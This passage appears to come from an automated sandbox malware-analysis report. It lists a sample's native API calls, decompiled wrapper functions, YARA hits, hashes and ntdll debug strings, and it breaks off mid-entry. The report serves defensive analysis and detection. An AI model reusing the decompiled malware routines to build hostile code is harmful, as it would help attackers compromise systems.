                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00418720(intOrPtr _a4, void* _a8) {
                                                    				long _t8;
                                                    				void* _t11;
                                                    
                                                    				_t5 = _a4;
                                                    				_t2 = _t5 + 0x10; // 0x300
                                                    				_t3 = _t5 + 0xc50; // 0x409773
                                                    				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                    				_t8 = NtClose(_a8); // executed
                                                    				return _t8;
                                                    			}

APIs
• NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
Memory Dump Source
• Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0

APIs
Memory Dump Source
• Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Memory Dump Source
• Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:

C-Code - Quality: 37%
E00418970(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, char _a48, intOrPtr _a52) {
    void* _t22;
    void* _t33;
    intOrPtr* _t34;

    _t16 = _a4;
    _t2 = _t16 + 0xa14; // 0x58de852
    _t3 = _t16 + 0xc80; // 0x408929
    _t34 = _t3;
    E004191F0(_t33, _a4, _t34, *_t2, 0, 0x37);
    _t5 = &_a48; // 0x407c65
    _t22 = *((intOrPtr*)(*_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, *_t5, _a52); // executed
    return _t22;
}

APIs
• CreateProcessInternalW.KERNELBASE(00407C3D,00407C65,004079FD,00000010,?,00000044,?,?,?,00000044,e|@D,00000010,004079FD,00407C65,00407C3D,00407CA9), ref: 004189C4
Strings
Memory Dump Source
• Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID: e|@D
• API String ID: 2186235152-4053762965

APIs
• RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
Strings
Memory Dump Source
• Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FreeHeap
• String ID: %mA
• API String ID: 3298025750-273627637

C-Code - Quality: 36%
E004188C0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
    void* _t10;
    void* _t12;
    void* _t15;

    E004191F0(_t15, _a4, _a4 + 0xc70, *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
    _t6 = &_a8; // 0x413546
    _t12 = *_t6;
    _push(_a16);
    _push(_a12);
    _t10 = RtlAllocateHeap(_t12); // executed
    return _t10;
}

APIs
• RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
Strings
Memory Dump Source
• Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AllocateHeap
• String ID: F5A
• API String ID: 1279760036-683449296

                                                    C-Code - Quality: 74%
                                                    			E00407290(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
                                                    				char _v67;
                                                    				char _v68;
                                                    				void* __esi;
                                                    				void* _t12;
                                                    				intOrPtr* _t13;
                                                    				int _t14;
                                                    				long _t22;
                                                    				intOrPtr* _t26;
                                                    				void* _t27;
                                                    				void* _t31;
                                                    
                                                    				_t31 = __eflags;
                                                    				_v68 = 0;
                                                    				E0041A150( &_v67, 0, 0x3f);
                                                    				E0041AD30( &_v68, 3);
                                                    				_t25 = _a4 + 0x1c;
                                                    				_t12 = E00409B50(__ebx, __edi, _a4 + 0x1c, _t31, _a4 + 0x1c,  &_v68); // executed
                                                    				_t13 = E00413E60(_t25, _t12, 0, 0, 0xc4e7b6d6);
                                                    				_t26 = _t13;
                                                    				if(_t26 != 0) {
                                                    					_push(__edi);
                                                    					_t22 = _a8;
                                                    					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                                    					_t33 = _t14;
                                                    					if(_t14 == 0) {
                                                    						_t14 =  *_t26(_t22, 0x8003, _t27 + (E004092B0(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                    					}
                                                    					return _t14;
                                                    				}
                                                    				return _t13;
                                                    			}

                                                    Instruction addresses: 0x00407290, 0x0040729f, 0x004072a3, 0x004072ae, 0x004072ba, 0x004072be, 0x004072ce, 0x004072d3, 0x004072da, 0x004072dc, 0x004072dd, 0x004072ea, 0x004072ec, 0x004072ee, 0x0040730b, 0x0040730b, 0x00000000, 0x0040730d, 0x00407312


                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                    • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                                    • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                    • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 30%
                                                    			E00418900(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* _a4, void* _a8, long _a12, void* _a16) {
                                                    				char _t15;
                                                    				void* _t22;
                                                    
                                                    				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
                                                    				 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
                                                    				E004191F0(_t22);
                                                    				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                    				return _t15;
                                                    			}

                                                    Instruction addresses: 0x00418905, 0x00418914, 0x00418917, 0x0041892d, 0x00418931


                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                    				int _t10;
                                                    				void* _t15;
                                                    
                                                    				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                    				return _t10;
                                                    			}

                                                    Instruction addresses: 0x00418a7a, 0x00418a90, 0x00418a94


                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00418940(intOrPtr _a4, int _a8) {
                                                    				void* _t10;
                                                    
                                                    				_t5 = _a4;
                                                    				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                    				ExitProcess(_a8);
                                                    			}

                                                    Instruction addresses: 0x00418943, 0x0041895a, 0x00418968


                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 1527c710c1e0e2c83c67bf8fb86e93aa41cb4e5c46ac5ee222a6d8163aee5256
                                                    • Instruction ID: ba833e51994be8ccf52532ac0b01eb9847a0628f2f7d48cea821d77d8d67efdd
                                                    • Opcode Fuzzy Hash: 1527c710c1e0e2c83c67bf8fb86e93aa41cb4e5c46ac5ee222a6d8163aee5256
                                                    • Instruction Fuzzy Hash: 50B09B71D054C5C5D715D7614608717794077D0751F17C061D2020641B4778C495F5B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Strings
                                                    • The resource is owned exclusively by thread %p, xrefs: 00FCB374
                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00FCB314
                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FCB3D6
                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 00FCB48F
                                                    • a NULL pointer, xrefs: 00FCB4E0
                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00FCB484
                                                    • write to, xrefs: 00FCB4A6
                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00FCB53F
                                                    • <unknown>, xrefs: 00FCB27E, 00FCB2D1, 00FCB350, 00FCB399, 00FCB417, 00FCB48E
                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 00FCB352
                                                    • read from, xrefs: 00FCB4AD, 00FCB4B2
                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00FCB323
                                                    • *** Inpage error in %ws:%s, xrefs: 00FCB418
                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FCB38F
                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00FCB305
                                                    • This failed because of error %Ix., xrefs: 00FCB446
                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00FCB39B
                                                    • *** then kb to get the faulting stack, xrefs: 00FCB51C
                                                    • *** enter .cxr %p for the context, xrefs: 00FCB50D
                                                    • The instruction at %p referenced memory at %p., xrefs: 00FCB432
                                                    • The instruction at %p tried to %s , xrefs: 00FCB4B6
                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00FCB2DC
                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00FCB47D
                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00FCB2F3
                                                    • Go determine why that thread has not released the critical section., xrefs: 00FCB3C5
                                                    • *** enter .exr %p for the exception record, xrefs: 00FCB4F1
                                                    • The resource is owned shared by %d threads, xrefs: 00FCB37E
                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00FCB476
                                                    • an invalid address, %p, xrefs: 00FCB4CF
                                                    • The critical section is owned by thread %p., xrefs: 00FCB3B9
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                    • API String ID: 0-108210295
                                                    • Opcode ID: 245a32bc8c4489b0ceeab4d39d1b662c525f860205e0e4c31fad508f118723ec
                                                    • Instruction ID: cfc5e7bd4d3cb1cd31946c2027cb3302bd7362aeb012681d1528204bf7372d1c
                                                    • Opcode Fuzzy Hash: 245a32bc8c4489b0ceeab4d39d1b662c525f860205e0e4c31fad508f118723ec
                                                    • Instruction Fuzzy Hash: EE81E1B9A40211FFDB29AE458D47F7F3B26AF46B61F454048F4042B193E365C851FAB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                    • API String ID: 0-2897834094
                                                    • Opcode ID: 0ea75f4086b2fe9dbf43766bbdf153364322b76b14daa17c7d47bff9d0a819dc
                                                    • Instruction ID: 9fdbeec20b39a7441a1f9fd753a38adca8aa3e00551d3ffae41411836a61df4a
                                                    • Opcode Fuzzy Hash: 0ea75f4086b2fe9dbf43766bbdf153364322b76b14daa17c7d47bff9d0a819dc
                                                    • Instruction Fuzzy Hash: C0619337A65148FFD3119744E855A7173A6F704B30B1D846BF8097B392C7299C80BF0A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • Kernel-MUI-Number-Allowed, xrefs: 00F23D8C
                                                    • Kernel-MUI-Language-Allowed, xrefs: 00F23DC0
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00F23E97
                                                    • WindowsExcludedProcs, xrefs: 00F23D6F
                                                    • Kernel-MUI-Language-SKU, xrefs: 00F23F70
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 0-258546922
                                                    • Opcode ID: 556bb974310fbde98b618669a1ff8b21542c3b975d1739de5764262843b11b35
                                                    • Instruction ID: 3a0b2f4843530aab9b9e7ff2c804b63564518bd42e251d16d80dee3018f2d8ca
                                                    • Opcode Fuzzy Hash: 556bb974310fbde98b618669a1ff8b21542c3b975d1739de5764262843b11b35
                                                    • Instruction Fuzzy Hash: 69F1A1B2D00628EFCB11DF98D981AEEBBB9FF48750F14006AE905E7251D7749E05EB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Re-Waiting$RegLoadRegistryInfo
                                                    • API String ID: 0-3584235622
                                                    • Opcode ID: 4d9ded31138b85d91d586bd95360f0537a7e08ba4d07420340ebe0f426a933e3
                                                    • Instruction ID: 230132cb03707dc29e397adc468d5f3953631a33d8de13c998b87937c80c5fb3
                                                    • Opcode Fuzzy Hash: 4d9ded31138b85d91d586bd95360f0537a7e08ba4d07420340ebe0f426a933e3
                                                    • Instruction Fuzzy Hash: 6D615331E006049FDB32DFA8E880BBE77A1EB40330F240279E855972C1C7389D85B781
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RegLoadRegistryInfo
                                                    • API String ID: 0-282410176
                                                    • Opcode ID: fe44051aa3a2dfad77b44901159923bef983a584f279ed4ffc9b7451458994e4
                                                    • Instruction ID: 41ecab7f55eefd9f2253da5f99df06d00edfc5a958edb3376a846a4154afc031
                                                    • Opcode Fuzzy Hash: fe44051aa3a2dfad77b44901159923bef983a584f279ed4ffc9b7451458994e4
                                                    • Instruction Fuzzy Hash: 55F181719083118BC724CF59C481A3AB7E1FF98724F54896EF88ACB251E734EC95EB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: _vswprintf_s
                                                    • String ID:
                                                    • API String ID: 677850445-0
                                                    • Opcode ID: 73aacb698fea24605ae30dbcf4b3cb5b21652ae5b423bc2042530914373453be
                                                    • Instruction ID: 89310a71a086947d7584e365d76e246ad4e0fa8aa6e731aa2b5ba4af72128f25
                                                    • Opcode Fuzzy Hash: 73aacb698fea24605ae30dbcf4b3cb5b21652ae5b423bc2042530914373453be
                                                    • Instruction Fuzzy Hash: A051F471D00259CFDB31CF64C845BAEBBB0BF04320F2081AAE95DAB281D7745D45EB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3B9A5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 885266447-0
                                                    • Opcode ID: 5f51aeef7290a978bd517abc8cda99a9c3a586fbea64338beaad5529c63b8f88
                                                    • Instruction ID: b0944d62345824871873cd402ae3b710976a7335a8accb3887a7cec10b5e88eb
                                                    • Opcode Fuzzy Hash: 5f51aeef7290a978bd517abc8cda99a9c3a586fbea64338beaad5529c63b8f88
                                                    • Instruction Fuzzy Hash: 7B515B71A08741CFC720DF29C490A2ABBE5FB88720F24896EFA8587355D735EC44DB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00F8BE0F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                    • API String ID: 0-865735534
                                                    • Opcode ID: 6218cccb16c4a44ed2ccb4f6115b60c91e31f0b014a314acc4fb1bccab839111
                                                    • Instruction ID: 2ab7c7b27b06b0dc586f3e8fbbd4084c20ffb5c37e98aa6cf287533a899efcda
                                                    • Opcode Fuzzy Hash: 6218cccb16c4a44ed2ccb4f6115b60c91e31f0b014a314acc4fb1bccab839111
                                                    • Instruction Fuzzy Hash: 92A10632F0060A9FDB21DF64C890BAABBA4AF44720F144579ED4ADB681DB34DD09EB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RegLoadRegistryInfo
                                                    • API String ID: 0-282410176
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RegLoadRegistryInfo
                                                    • API String ID: 0-282410176
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: WindowsExcludedProcs
                                                    • API String ID: 0-3583428290
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • Critical error detected %lx, xrefs: 00FC8E21
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Critical error detected %lx
                                                    • API String ID: 0-802127002
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6999b08102d68666945d315ba49a31bd1cba5573b9266823c6682364f1be351
                                                    • Instruction ID: 5a09a6607ca5e56f0a4cf4323bd3c23758fd9063456c52a36113e86f24b335bc
                                                    • Opcode Fuzzy Hash: d6999b08102d68666945d315ba49a31bd1cba5573b9266823c6682364f1be351
                                                    • Instruction Fuzzy Hash: 6F219AB1A00644ABDB26DB68D881F2AB7A8FF48710F1400A9F944D7791D639ED10DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction ID: 001e2fcf472506be4196c74b17f99b29d5a07dd41d24c80b19c17302ce9534a0
                                                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction Fuzzy Hash: 41218072A00615EFDB21DF69C845A6AF7F8EB54321F14887AEA49A7240D370ED04EB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be64c20fe15543b1c6394f7975023d54cd93b37ed1c65ccbbf8215fffe4d59c5
                                                    • Instruction ID: cb65123d6d979710e6341970e3f466c7a03433defe3880ce30584a8a9a668eb7
                                                    • Opcode Fuzzy Hash: be64c20fe15543b1c6394f7975023d54cd93b37ed1c65ccbbf8215fffe4d59c5
                                                    • Instruction Fuzzy Hash: 5A21B072A00108AFCB11DF58CD81F5ABBBDFB40708F150069EA08AB251D775AE05DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 60421de704e28d33a5e6182ff0062ee62ac88f1ec8f393167a66434c384ef845
                                                    • Instruction ID: 35448a94d55fd96beaf57d04515edd16fcf1d1061a228cb69df305497f35835e
                                                    • Opcode Fuzzy Hash: 60421de704e28d33a5e6182ff0062ee62ac88f1ec8f393167a66434c384ef845
                                                    • Instruction Fuzzy Hash: D021F572A043449BDB21EF28C944B6BB7ECAF817A0F040467FD50C7252D738C909E6A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                    • Instruction ID: 3fb1523aee848694c2db17a401b87a35bae42d73ae699b0a004cdf53a88c9e33
